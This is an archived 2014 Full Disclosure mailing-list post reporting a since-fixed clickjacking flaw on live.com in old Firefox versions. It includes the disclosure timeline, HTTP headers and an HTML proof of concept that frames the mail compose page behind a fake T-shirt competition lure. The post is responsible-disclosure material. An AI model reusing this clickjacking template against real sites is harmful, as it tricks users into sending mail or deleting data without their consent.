lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 25 Apr 2014 18:11:03 +0530
From: Sandeep Kamble <sandeepk.l337@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>,
	fulldisclosure@...lists.org
Subject: [FD] UI redress attack on live.com (affected all pages)

On 7/29/13 I've reported Live.com XFO vulnerability to the *Microsoft
Security team* and finally their investigation came to conclusion and fixed
the bug. So, Here is details of bug and timeline of fixing bug. A year ago
on the weekend, I started digging into MS services for bugs.

The timeline of investigation of the bug : July 29, 2013 - April 16 , 2014.

[image: Name: msresponse.jpg Views: 202 Size: 23.1 KB]

The interesting part of the vulnerability all pages were protected for * UI
Addressing Attack * and while doing testing, normally I test application on
the all browsers. The weird part comes here, I was able to iframe the all
the pages of Live.com including pre-authentication and post-authentication
pages on Mozilla Firefox 3.6.28 to Mozilla Firefox 6. On Chrome and on
other browser all pages functionality of XFO was working perfectly.

Random announcement , nothing do with this post : Check out recorded video
of Garage4Hackers Ranchoddas Webcast Series - Browser Crash Analysis By
David Rude II aka Bannedit <https://www.youtube.com/watch?v=Qk0ORbFZ81I>
Note : Have look the same vulnerability on Facebook Application Installing
<http://www.garage4hackers.com/showthread.php?t=2528>

Obviously , you must be thinking why this thing is happening with Mozilla.
After doing some research and consulting with *G4H team* , I've concluded,
it may be issue with *Gecko Engine*. The test environment was win 7 ,
ubuntu 10,11,12.
Note : If you stumbled upon on the same issue of Gecko, then please do
reply on this thread.

Check out the following headers , XFO header is missing on Gecko/20120306
Firefox/3.6.28 to MF 6.

 Code:

        https://blu166.mail.live.com/m/?bfv=wm

        GET /m/?bfv=wm HTTP/1.1
        Host: blu166.mail.live.com
        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US;
rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-us,en;q=0.5
        Accept-Encoding: gzip,deflate
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
        Keep-Alive: 115
        Connection: keep-alive
        Cookie:


        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Content-Encoding: gzip
        Vary: Accept-Encoding
        Server: Microsoft-IIS/7.5
        X-Wlp-StartTime: 29-07-2013 10:10:32 AM
        xxn: 22
        P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
        MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
        X-Powered-By: ASP.NET
        Content-Length: 3113
        Date: Mon, 29 Jul 2013 10:10:32 GMT
        Connection: keep-alive
        Set-Cookie: bfv=wm; domain=.live.com; path=/
        Set-Cookie: widecontext=X; path=/; secure
        Set-Cookie: domain=.live.com; path=/
        Set-Cookie: xidseq=7; domain=.live.com; path=/
        Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013
08:30:32 GMT; path=/
        Cache-Control: no-cache, no-store, must-revalidate, no-transform
        Pragma: no-cache
        Expires: -1, -1

Here is some print screen of basic operations of live.com (I would like to
remind you , every page of live.com was vulnerable )

Attacker developed this page to attack on victim.



*Composing Email : *



*Uploading Attachment : *



*Deleting Emails : *

[IMG]https://dl.dropboxusercontent.com/u/18007092/ms-click4.png[IMG]

HTML POC , which i used sent to MS Security Team

 Code:

<html>
<!-- This Quick Developed POC , for testing purpose --!>
<!-- Visit Garage4hackers.com  --!>
<head>
	<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
	<style>
		iframe {
		  width:800px;
		  height:800px;
		  position:absolute;
		  top:0; left:0;
		  filter:alpha(opacity=50); /* in real life opacity=0 */
		  opacity:0.5;
		}
	</style>
</head>
<body>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Muilkha Bhag T-shirts. </b></center>

    <iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
	<a href="http://www.google.com" target="_blank" style="position:
relative; left: 0px; top: 220px; z-index: -1;">Connect</a>

</body>
</html>








- [S]
Garage4hackers.com

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists